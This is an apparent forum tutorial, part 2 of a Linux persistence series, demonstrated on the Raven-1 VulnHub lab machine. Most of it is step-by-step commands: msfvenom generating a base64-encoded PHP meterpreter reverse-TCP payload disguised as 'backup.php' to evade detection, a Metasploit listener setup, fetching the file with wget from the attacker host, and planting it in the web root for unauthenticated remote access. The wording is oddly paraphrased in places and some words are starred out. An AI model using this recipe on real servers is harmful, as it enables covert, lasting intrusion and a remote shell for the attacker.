[Linux Persistence] | VIA WEB SHELL - PART 2

[ethical hacker]

Requirements:

1. Kali Linux OR Parrot OS
2. Practical understanding of T*****/IP
3. The tutorial were conducted against a compromised Linux Virtual Machine that has been set up to demonstrate the process of exploitation and privilege escalation. It can be downloaded here:
   https://www.vulnhub.com/entry/raven-1,256/

Goal:
The intention is to secure a presence on the Linux target once an initial entry point has been acquired.

PART 2. PERSISTENCE THROUGH WEB SHELL:
The persistence tactic entails creating and uploading a PHP web shell onto the target server. Assuming that the aforesaid server is operating the LAMP stack, we may forge a PHP meterpreter payload and introduce it to the web server as a means of covert entry.

The initial stage entails generating the PHP meterpreter payload via Msfvenom; this process may be initiated by entering the subsequent command:

Code: Select all

msfvenom -p php/meterpreter/reverse_t***** LHOST=<KALI-IP> LPORT=<PORT> -e php/base64 -f raw > backup.php

To escape detection, we shall spare the payload under the filename "backup.php".

Upon having created the payload, the subsequent phase calls for alteration of the payload, by appending the PHP tags so that the said script is effectively executed, as demonstrated in the accompanying image.


We are now in a position to establish the listener utilising Metasploit by entering the ensuing commands:

Code: Select all

msfconsole

Code: Select all

use multi/handler

Code: Select all

set payload php/meterpreter/reverse_t*****

Code: Select all

set LHOST <KALI-IP>

Code: Select all

set LPORT <PORT>

Code: Select all

run

The following stage shall encompass the uploading of the PHP shell, which we recently created, unto the internet host. This action may be accomplished by establishing a nearby web server within the Kali Virtual Machine and transmitting it onto the intended recipient.

Code: Select all

sudo python -m SimpleHTTPServer 80

Code: Select all

wget https://<KALI-IP>/backup.php

In this instance, we shall transmit the aforementioned "backup.php" file to the crux of the web server, located beneath the /var/www/html directory, as displayed within the ensuing pictorial representation.


We are capable of acquiring a meterpreter session on the objective by perusing to the aforementioned "backup.php" file located upon the web server. Access may be attained by utilising the following URL within your web browser:

Code: Select all

https://<SERVER-IP>/backup.php

Navigating through the browser in such a manner shall foremostly execute the PHP code, subsequently presenting you with a meterpreter session on your receiver, as illustrated within the ensuing illustration.

Furthermore, we have successfully established continuity by uploading a meterpreter web shell, securing unfettered access to the objective server, without the necessity for authentication via Secure Shell.